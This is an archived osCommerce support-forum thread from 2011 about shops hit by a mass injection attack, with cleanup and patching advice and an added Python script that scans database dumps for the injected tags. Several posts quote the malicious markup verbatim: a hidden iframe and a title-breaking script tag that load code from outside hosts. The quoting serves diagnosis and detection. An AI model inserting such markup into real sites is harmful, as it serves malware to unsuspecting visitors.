stevenchim, Posted July 25, 2011
Starting from last Saturday some additional code has been appearing on my site. For example, when I receive an e-mail from the customer enquiry box, the title is shown as XXXXXXXX<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>XXX. The script in between was added by unknown people. Did anyone have this problem too? And how can I remove it?
Jack_mcs, Posted July 25, 2011
You have to find the files where the code was edited and re-edit them. Sometimes there is only one file and sometimes there are hundreds of them. There may also be files added to allow the hacker to continue editing your code. You need to remove all of those files. Once that is done, or before, you need to apply the security changes as mentioned many times a day on these forums. Otherwise the hacker will just come back.
Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons: Get the latest versions of my addons. Recommended SEO Addons.
stevenchim (Author), Posted July 25, 2011
Yes, I am downloading all the code of the site and trying to look at it.
stevenchim (Author), Posted July 25, 2011
Any idea where to start looking? The first step I took was just searching for the keyword, but with no result. Any idea where I should start looking? The recent change is that I changed the permission of the image folder to 777.
Jack_mcs, Posted July 26, 2011
It varies with the hacker. Search for just iframe and that may show something. But keep in mind that legitimate code might use iframe too, so you can't just delete any you find. Also look in your images directory for non-image files. There usually shouldn't be any except for a .htaccess file.
stevenchim (Author), Posted July 26, 2011
I found maybe twenty .php files in the image folder, which should not exist in this folder. I deleted them all and am still looking for unusual files. Thanks.
stevenchim (Author), Posted July 26, 2011
When I go to the site, it loads some unknown elements like exero.eu, gooqlepic.com, yandekapi.com, etc. Still trying to find where to remove them.
♥Biancoblu, Posted July 26, 2011
If you still have the problem it means you haven't removed all of the hacker's code. If I were you I'd delete the entire site and restore it all from a good backup, provided you have a good backup? If not, I suggest you get a professional to look at your files and cleanse them properly. Like Jack said, you will then have to apply security measures.
~ Don't mistake my kindness for weakness ~
the_katsu, Posted July 26, 2011
My site got hacked this way too. You need to erase the injected code in your database. http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html In my case I had to remove <iframe> tags from zen_configuration and <script> from zen_categories_description. I'm using Zen-cart 1.2.x. The site works now, but I wonder how it's possible to make sure this won't happen again. Any patch released?
stevenchim (Author), Posted July 26, 2011
Thanks for your information. I have looked into the database, but it seems fine to me. I can't find any <iframe> tags in the database :(
lmalonsof, Posted July 26, 2011
Hi there, we have the same problem. We've been infected with this: <iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe> It was in the 'configuration_value' field of the 'configuration' table, in the first record, just where 'Store_name' is. We've been able to clean the database and now it is fine, but we don't know what to do. We assume this is an osCommerce bug, but which version is safe? Do we have to upgrade from 2.2RC2 to 2.3.1? Is this bug in the new ones too? Thanks.
♥Biancoblu, Posted July 26, 2011
If you are using version 2.2, make sure you apply ALL the security measures described here: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-oscommerce-22-site/ Version 2.3.1 has fixed a lot of security bugs. Upgrading from 2.2 to 2.3.1 requires some work on the database because the structure is different, and many addons written for 2.2 will have to be slightly reworked to work on 2.3.1.
lmalonsof, Posted July 26, 2011
OK, working on it. We'll report further problems.
sucuri, Posted July 27, 2011
Those are not injected in the database, but inside the text defines of your site (at least in the ones we analyzed). So a grep for that keyword should find where they are. This scanner should tell you if your site is hacked: http://sitecheck.sucuri.net
Guest, Posted July 30, 2011
Our site got hacked as well. It was injected in the DB (config values). Only removing it from the database won't help for long; you have to update the security. We followed the steps in the above-mentioned secure osCommerce thread and installed the osC_Sec package r8. Since then, no more successful attacks (although we get attacks every 5 hours or so with all kinds of attempts to get in...) - none gets through anymore ;) Oh, we have 2.2, so I don't think you have to update the whole system, I wouldn't take that pain... Feel free to contact us for help.
stevenchim (Author), Posted August 1, 2011
So which table(s) of the DB are affected?
Taipo, Posted August 1, 2011
Steven, basically if your site is not patched against the known exploit hole in the admin area that was reported last year, then removing all the hack code will be no different than trying to push the tide out with your hands. You need to also patch your site's security as is listed in most of the discussions in this part of the forums. That is assuming you are at least using a recent version of osCommerce. Versions up to 2.2rc1 need patching urgently, and in cases where 2.2rc1 has been completely trashed by hacks, it's best then to just upgrade to 2.3.1. Pound for pound it's no different in terms of time and energy to fix a heavily hacked-up website as it is to transfer to the latest version of osCommerce. I have observed many users spend weeks trying to track and trace through all of their files to repair the damage that 'some' hacks can wreak on a website; match that to the week it would take you to rebuild your site on 2.3.1 and import your products. Earlier versions than 2.2 just need to be ditched and you need to start again with 2.3.1. Most of those files you found in your images directory will probably be shell code - or in plain terms, file managers that give hackers almost the same amount of access to your site as the file manager in the admin directory does. If you intend to continue using 2.2rc1 after cleaning up, then I recommend that you follow the suggestions here - at the very least options 2, 5 & 6 - the rest being optional extras that can help improve security as well.
- Stop osCommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
stevenchim (Author), Posted August 2, 2011
Thank you very much for the advice. I will try to see what I can do. As we all know, the shop name is changed like every 5 hours. Yesterday I deleted the file manager PHP file from admin, and now it seems fine.
Query11, Posted August 2, 2011
Try to clean using the SQL scripts from here: http://www.greatis.com/security/exero-eu-web-site-infection-removal.htm http://www.greatis.com/security/willysy-com-images-banners-infection-removal.htm The scripts are free. Update your osCommerce.
sucuri, Posted August 2, 2011
Query11: Very good scripts, thanks for sharing. They are now using "1see.ir/j/" in the injection... So a new one to add there. Some details: http://sucuri.net/oscommerce-compromises-1see-irj-willysy-com-and-exero-eu.html Thanks,
Query11, Posted August 3, 2011
Thank you for your useful information. Looks like "1see.ir/j/" is an improved version of "exero". It infects not only configuration. "1see.ir/j/" is able to be injected into each text field of the database. Here is the free script for removal of "1see.ir/j/": http://www.greatis.com/security/1see-ir-infection-removal.htm
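A small audit script, added here as an example and not code from this thread, osCommerce or greatis.com, that scans dumped text columns for the markup families quoted above: the hidden <iframe> lmalonsof found in configuration_value, and <script> or </title> tags in any text field, as Query11 describes for the later injection. The sample dump is constructed; the configuration key STORE_NAME is the real osCommerce key, the other row labels are placeholders.

```python
import re
from typing import Dict, List, NamedTuple

# Tag families reported in this thread: a hidden <iframe> and a remote <script>,
# including the </title><script ...></script><title> breakout seen in a store name.
# Matches a complete tag pair, or a stray open/close tag on its own.
INJECTED_MARKUP = re.compile(
    r"<\s*(iframe|script)\b[^>]*>.*?<\s*/\s*\1\s*>"   # <iframe>...</iframe> / <script>...</script>
    r"|</?\s*(?:iframe|script|title)\b[^>]*>",        # stray </title> ... <title> or unclosed <script>
    re.IGNORECASE | re.DOTALL,
)


class Finding(NamedTuple):
    table: str
    key: str
    fragment: str   # first injected fragment found, for the report
    cleaned: str    # value with all matching tags removed, for manual review before writing back


def scan_table(table: str, rows: Dict[str, str]) -> List[Finding]:
    """Scan every text value of one table (key -> value) for injected tags."""
    findings = []
    for key, value in rows.items():
        match = INJECTED_MARKUP.search(value)
        if match:
            cleaned = INJECTED_MARKUP.sub("", value).strip()
            findings.append(Finding(table, key, match.group(0), cleaned))
    return findings


def audit(dump: Dict[str, Dict[str, str]]) -> List[Finding]:
    """Scan all tables of a dump; ordinary HTML such as <b> is not flagged."""
    return [f for table, rows in dump.items() for f in scan_table(table, rows)]


# Constructed sample rows (not a real shop's data), reusing the fragments quoted in the thread.
SAMPLE_DUMP = {
    "configuration": {
        "STORE_NAME": "Example Shop<iframe src='http://willysy.com/images/banners/' "
                      "style='position:absolute;visibility:hidden'></iframe>",
        "STORE_OWNER": "Steven",
    },
    "categories_description": {
        "categories_name:1": "Hardware</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title>",
        "categories_name:2": "<b>Sale</b> items",   # legitimate HTML, must not be flagged
    },
}

if __name__ == "__main__":
    for f in audit(SAMPLE_DUMP):
        print(f"{f.table}.{f.key}: found {f.fragment!r} -> cleaned {f.cleaned!r}")
```

Run it against a text export of the tables rather than the live database, and review each cleaned value before restoring it, since legitimate descriptions may contain HTML of their own.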
stevenchim (Author), Posted August 9, 2011
After I did all the actions mentioned above, the site was OK for the last few days, but today something new appeared: (shop name)</title><script src=http://tiasissi.com.br/revendedores/jquery/></script><title> sign...
Guest, Posted August 9, 2011
Steven, your site is vulnerable to hacker attacks and needs to be cleaned and secured to prevent injection attacks like that. Chris
Taipo, Posted August 9, 2011
Steven, did you give osC_Sec a try in the end?
stevenchim (Author), Posted August 11, 2011
What is osC_Sec?
This topic is now archived and is closed to further replies.